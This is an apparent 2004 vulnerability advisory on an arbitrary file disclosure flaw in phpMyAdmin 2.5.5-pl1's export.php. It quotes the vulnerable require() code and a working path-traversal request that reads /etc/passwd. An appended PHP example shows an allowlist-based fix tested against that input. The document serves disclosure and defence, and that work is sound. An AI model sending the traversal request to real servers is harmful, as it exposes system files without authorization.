Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior

From: Cedric Cochin (cco_at_netvigilance.com)
Date: 02/03/04

    Date: Tue, 3 Feb 2004 11:28:57 +0100
    To: submissions@packetstormsecurity.org, vuln@secunia.com, news@securiteam.com, bugtraq@securityfocus.com, bugs@securitytracker.com
    
    

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

       Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior

    ################################################################################
    Summary :

    phpMyAdmin is a tool written in PHP intended to handle the administration of
    MySQL over the WWW. There is a vulnerability in the current stable version of
    phpMyAdmin that allows an attacker to retrieve arbitrary files from the
    webserver with the privileges of the webserver process.

    ################################################################################
    Details :

    The export PHP script can be exploited to disclose arbitrary files through a
    PHP include() call whose path is built from the request's "what" parameter.

    Vulnerable Systems:
    * phpMyAdmin 2.5.5-pl1 and prior

    Release Date :
    February 2, 2004

    Severity :
    HIGH

    ################################################################################
    Examples :

                      -------------------------------------------

    I - Arbitrary File Disclosure
    (HIGH Risk)

    File impacted : export.php

    // What type of export are we doing?
    // $what is taken from the request (?what=...) and is not validated.
    if ($what == 'excel') {
        $type = 'csv';
    } else {
        $type = $what;
    }

    /**
     * Defines the url to return to in case of error in a sql statement
     */
    // Vulnerable: $type is concatenated into the include path unchecked.
    require('./libraries/export/' . $type . '.php');

    Exploit example:

    - -- HTTP Request --

    http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00

    - -- HTTP Request --

    The vulnerability is exploitable even if PHP register_globals is set to off.

    ################################################################################
    Vendor Status :

    The information has been provided to the phpMyAdmin Project Managers.
    A new release candidate 2.5.6-rc1 with fixes for this vulnerability is available.
    - --> http://www.phpmyadmin.net/home_page/
    - --> http://www.phpmyadmin.net/home_page/relnotes.php?rel=0

    ################################################################################
    Credit :

    Cedric Cochin, Security Engineer, netVigilance, Inc. (www.netvigilance.com)
    < cco@netvigilance.com >

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (GNU/Linux)
    Comment: For info see http://www.gnupg.org

    iD8DBQFAH3dJA9/8vqmWoYQRAjNoAJ4pGgoQBT9WoyPmbfw4h/6LkcjR6wCeNBj2
    ekO25itz2ssIvwgf2WRb/4k=
    =Yuh1
    -----END PGP SIGNATURE-----
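
A hardened counterpart to the `require()` in the export.php excerpt, as an added example: it is not code from phpMyAdmin or from the 2.5.6-rc1 fix, whose contents the advisory does not describe. The helper `resolve_export_plugin()`, the temporary directory and the stub plugin files are constructed for illustration.

```php
<?php
// Added example, not phpMyAdmin code; resolve_export_plugin() is hypothetical.

/**
 * Map the request's "what" value to a plugin file inside $pluginDir.
 * Returns the absolute path to include, or null when the value is not the
 * bare name of a plugin that exists in that directory.
 */
function resolve_export_plugin(string $what, string $pluginDir): ?string
{
    // Same alias as the original export.php.
    $type = ($what === 'excel') ? 'csv' : $what;

    // Allowlist built from the files present in the plugin directory, so a
    // request can only select one of them by exact name (strict comparison).
    $allowed = array_map(
        static fn(string $f): string => basename($f, '.php'),
        glob($pluginDir . '/*.php') ?: []
    );
    if (!in_array($type, $allowed, true)) {
        return null;
    }

    // Defence in depth: the resolved file must still sit directly in $pluginDir.
    $base = realpath($pluginDir);
    $path = realpath($pluginDir . '/' . $type . '.php');
    if ($base === false || $path === false || dirname($path) !== $base) {
        return null;
    }
    return $path;
}

// Constructed demo: a throwaway plugin directory holding two stub plugins.
$dir = sys_get_temp_dir() . '/export_demo_' . getmypid();
mkdir($dir);
foreach (['csv', 'sql'] as $name) {
    file_put_contents("$dir/$name.php", "<?php // stub $name plugin\n");
}

// The third sample is the decoded "what" value from the advisory's request.
$samples = ['sql', 'excel', '../../../../../../etc/passwd' . "\0", 'nosuchtype', ''];
foreach ($samples as $what) {
    $path = resolve_export_plugin($what, $dir);
    printf("%-42s => %s\n", json_encode($what, JSON_UNESCAPED_SLASHES), $path === null ? 'rejected' : basename($path));
}

array_map('unlink', glob("$dir/*.php"));
rmdir($dir);
```

In export.php the caller would `require` the returned path and stop with an error when the helper returns null.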

